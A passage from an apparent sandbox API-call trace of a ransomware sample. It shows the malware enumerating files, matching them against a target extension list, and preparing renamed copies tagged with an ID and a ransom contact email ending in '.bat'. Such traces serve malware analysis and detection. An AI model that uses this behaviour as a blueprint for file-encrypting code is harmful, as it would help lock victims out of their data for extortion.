hHeap=0x6a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7035c0 | out: hHeap=0x6a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbe0 [0178.483] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbe0, Size=0x20) returned 0x458c178 [0178.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cbe0 [0178.483] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cbe0, Size=0x20) returned 0x458c240 [0178.483] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.483] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.483] Wow64DisableWow64FsRedirection (in: OldValue=0x363ff50 | out: OldValue=0x363ff50*=0x1) returned 1 [0178.483] lstrlenW (lpString="kernel32.dll") returned 12 [0178.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 [0178.484] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 Thread: id = 48 os_tid = 0xe8c [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3de0968 [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3df0970 [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7035d8 [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b608 [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703578 [0155.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x4195020 [0155.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703590 [0155.203] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703590, Size=0x20) returned 0x6ddf70 [0155.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703590 [0155.203] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703590, Size=0x20) returned 0x6dde80 [0155.203] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.203] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.203] Wow64DisableWow64FsRedirection (in: OldValue=0x377ff50 | out: OldValue=0x377ff50*=0x0) returned 1 [0155.203] lstrlenW (lpString="kernel32.dll") returned 12 [0155.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.203] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.204] Sleep (dwMilliseconds=0x64) [0155.599] Sleep (dwMilliseconds=0x64) [0156.203] Sleep (dwMilliseconds=0x64) [0156.867] Sleep (dwMilliseconds=0x64) [0157.263] Sleep (dwMilliseconds=0x64) [0157.476] lstrcmpiW (lpString1=".LOG", lpString2=".bat") returned 1 [0157.476] lstrlenW (lpString="BCD.LOG") returned 7 [0157.476] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.476] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.476] lstrlenW (lpString=".doc") returned 4 [0157.476] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0157.476] lstrlenW (lpString=".docx") returned 5 [0157.476] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0157.477] lstrlenW (lpString=".pdf") returned 4 [0157.477] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".xls") returned 4 [0157.477] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".xlsx") returned 5 [0157.477] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0157.477] lstrlenW (lpString=".ppt") returned 4 [0157.477] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString=".zip") returned 4 [0157.477] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".rar") returned 4 [0157.477] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".bz2") returned 4 [0157.477] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0157.477] lstrlenW (lpString=".7z") returned 3 [0157.477] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString=".dbf") returned 4 [0157.477] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString=".1cd") returned 4 [0157.477] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString=".jpg") returned 4 [0157.477] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.477] lstrlenW (lpString=".doc") returned 4 [0157.477] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0157.477] lstrlenW (lpString=".docx") returned 5 [0157.477] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0157.477] lstrlenW (lpString=".pdf") returned 4 [0157.477] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".xls") returned 4 [0157.477] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0157.477] lstrlenW (lpString=".xlsx") returned 5 [0157.478] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0157.478] lstrlenW (lpString=".ppt") returned 4 [0157.478] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0157.478] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.478] lstrlenW (lpString=".zip") returned 4 [0157.478] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0157.478] lstrlenW (lpString=".rar") returned 4 [0157.478] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0157.478] lstrlenW (lpString=".bz2") returned 4 [0157.478] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0157.478] lstrlenW (lpString=".7z") returned 3 [0157.478] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0157.478] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.478] lstrlenW (lpString=".dbf") returned 4 [0157.478] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0157.478] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.478] lstrlenW (lpString=".1cd") returned 4 [0157.478] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0157.478] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0157.478] lstrlenW (lpString=".jpg") returned 4 [0157.478] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0157.478] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0157.478] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0157.478] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0157.479] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=4662) returned 1 [0157.479] CloseHandle (hObject=0x3e4) returned 1 [0157.479] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0157.479] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0157.479] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.479] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.479] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.479] lstrlenW (lpString=".doc") returned 4 [0157.479] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString=".docx") returned 5 [0157.480] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0157.480] lstrlenW (lpString=".pdf") returned 4 [0157.480] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0157.480] lstrlenW (lpString=".xls") returned 4 [0157.480] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0157.480] lstrlenW (lpString=".xlsx") returned 5 [0157.480] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0157.480] lstrlenW (lpString=".ppt") returned 4 [0157.480] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString=".zip") returned 4 [0157.480] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0157.480] lstrlenW (lpString=".rar") returned 4 [0157.480] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0157.480] lstrlenW (lpString=".bz2") returned 4 [0157.480] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString=".7z") returned 3 [0157.480] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString=".dbf") returned 4 [0157.480] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString=".1cd") returned 4 [0157.480] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString=".jpg") returned 4 [0157.480] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.480] lstrlenW (lpString=".doc") returned 4 [0157.480] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0157.480] lstrlenW (lpString=".docx") returned 5 [0157.480] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0157.480] lstrlenW (lpString=".pdf") returned 4 [0157.480] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0157.481] lstrlenW (lpString=".xls") returned 4 [0157.481] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0157.481] lstrlenW (lpString=".xlsx") returned 5 [0157.481] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0157.481] lstrlenW (lpString=".ppt") returned 4 [0157.481] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0157.481] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.481] lstrlenW (lpString=".zip") returned 4 [0157.481] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0157.481] lstrlenW (lpString=".rar") returned 4 [0157.481] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0157.481] lstrlenW (lpString=".bz2") returned 4 [0157.481] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0157.481] lstrlenW (lpString=".7z") returned 3 [0157.481] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0157.481] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.481] lstrlenW (lpString=".dbf") returned 4 [0157.481] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0157.481] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.481] lstrlenW (lpString=".1cd") returned 4 [0157.481] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0157.481] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0157.481] lstrlenW (lpString=".jpg") returned 4 [0157.481] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0157.481] Sleep (dwMilliseconds=0x64) [0157.944] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0157.944] lstrlenW (lpString="kor-kor.xml") returned 11 [0157.944] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.250] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=392) returned 1 [0158.250] CloseHandle (hObject=0x414) returned 1 [0158.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml")) returned 0x20 [0158.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.250] lstrlenW (lpString=".doc") returned 4 [0158.250] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.250] lstrlenW (lpString=".docx") returned 5 [0158.250] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0158.250] lstrlenW (lpString=".pdf") returned 4 [0158.250] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.250] lstrlenW (lpString=".xls") returned 4 [0158.250] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.250] lstrlenW (lpString=".xlsx") returned 5 [0158.251] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0158.251] lstrlenW (lpString=".ppt") returned 4 [0158.251] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString=".zip") returned 4 [0158.251] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.251] lstrlenW (lpString=".rar") returned 4 [0158.251] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString=".bz2") returned 4 [0158.251] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString=".7z") returned 3 [0158.251] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString=".dbf") returned 4 [0158.251] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString=".1cd") returned 4 [0158.251] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString=".jpg") returned 4 [0158.251] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.251] lstrlenW (lpString=".doc") returned 4 [0158.251] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.251] lstrlenW (lpString=".docx") returned 5 [0158.251] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0158.252] lstrlenW (lpString=".pdf") returned 4 [0158.252] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString=".xls") returned 4 [0158.252] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString=".xlsx") returned 5 [0158.252] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0158.252] lstrlenW (lpString=".ppt") returned 4 [0158.252] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.252] lstrlenW (lpString=".zip") returned 4 [0158.252] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.252] lstrlenW (lpString=".rar") returned 4 [0158.252] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString=".bz2") returned 4 [0158.252] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString=".7z") returned 3 [0158.252] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.252] lstrlenW (lpString=".dbf") returned 4 [0158.252] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.252] lstrlenW (lpString=".1cd") returned 4 [0158.252] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 83 [0158.252] lstrlenW (lpString=".jpg") returned 4 [0158.252] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.253] Sleep (dwMilliseconds=0x64) [0158.401] Sleep (dwMilliseconds=0x64) [0158.671] Sleep (dwMilliseconds=0x64) [0158.944] Sleep (dwMilliseconds=0x64) [0159.322] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.322] lstrlenW (lpString="J0105292.WMF") returned 12 [0159.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0159.400] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=14868) returned 1 [0159.401] CloseHandle (hObject=0x420) returned 1 [0159.401] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf")) returned 0x220 [0159.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105292.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0x20 [0159.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.601] lstrlenW (lpString=".doc") returned 4 [0159.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.601] lstrlenW (lpString=".docx") returned 5 [0159.601] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0159.601] lstrlenW (lpString=".pdf") returned 4 [0159.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.601] lstrlenW (lpString=".xls") returned 4 [0159.601] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.601] lstrlenW (lpString=".xlsx") returned 5 [0159.602] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0159.602] lstrlenW (lpString=".ppt") returned 4 [0159.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString=".zip") returned 4 [0159.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.602] lstrlenW (lpString=".rar") returned 4 [0159.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString=".bz2") returned 4 [0159.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString=".7z") returned 3 [0159.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString=".dbf") returned 4 [0159.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString=".1cd") returned 4 [0159.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString=".jpg") returned 4 [0159.602] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.602] lstrlenW (lpString=".doc") returned 4 [0159.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.602] lstrlenW (lpString=".docx") returned 5 [0159.602] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0159.603] lstrlenW (lpString=".pdf") returned 4 [0159.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString=".xls") returned 4 [0159.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.603] lstrlenW (lpString=".xlsx") returned 5 [0159.603] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0159.603] lstrlenW (lpString=".ppt") returned 4 [0159.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.603] lstrlenW (lpString=".zip") returned 4 [0159.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.603] lstrlenW (lpString=".rar") returned 4 [0159.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString=".bz2") returned 4 [0159.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString=".7z") returned 3 [0159.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.603] lstrlenW (lpString=".dbf") returned 4 [0159.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.603] lstrlenW (lpString=".1cd") returned 4 [0159.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105292.WMF") returned 68 [0159.603] lstrlenW (lpString=".jpg") returned 4 [0159.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.604] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.604] lstrlenW (lpString="J0106958.WMF") returned 12 [0159.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.604] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=13784) returned 1 [0159.605] CloseHandle (hObject=0x42c) returned 1 [0159.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf")) returned 0x220 [0159.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.605] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.605] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, 